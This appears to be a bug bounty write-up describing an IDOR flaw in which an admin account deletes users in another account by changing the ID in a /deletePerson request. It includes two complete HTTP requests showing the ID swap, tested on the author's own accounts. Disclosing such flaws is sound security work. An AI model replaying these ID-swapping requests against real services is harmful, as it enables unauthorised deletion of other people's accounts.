IDOR Vulnerability Allowed the Deletion of Any User from an Administrator Account.

2 weeks ago 24
BOOK THIS SPACE FOR AD
ARTICLE AD

Explanation

Since the bug is not yet resolved and it’s a private bug bounty program, I will refer to the platform as example.com. I have a program with a business registration function that creates an admin account, granting full administrator permissions when creating an account, allowing you to add users, groups, and policies. I decided to create two accounts: one for the attacker and one for the victim. I created a user in each account and filled out the required information: First Name, Last Name, Email, ID(optional), and Group.

After creating these users, I wanted to test if there were additional functions available for editing user information. I found two functions: update with the /updatePerson endpoint and delete with the /deletePerson endpoint. I attempted to delete a user by clicking Delete User, intercepted the request, and confirmed the user deletion. I discovered that the program uses a REST API with JSON format and includes the user id from the administrator’s attacker account.

POST /deletePerson HTTP/2
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://example.com/
Authorization: Bearer <jwt>
Content-Type: application/json
Content-Length: 51
Origin: https://example.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: corsSec-Fetch-Site: same-site
Te: trailers
{
"id":1058716 //User ID from the administrator's attacker account
}

I tried changing the ID to the user ID from the victim account that I had created.

POST /deletePerson HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://redacted.com/
Authorization: Bearer <jwt>
Content-Type: application/json
Content-Length: 51
Origin: https://redacted.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: corsSec-Fetch-Site: same-site
Te: trailers
{
"id":1058718 //User ID from the administrator's victim account
}

The user from the victim account was successfully deleted.

Read Entire Article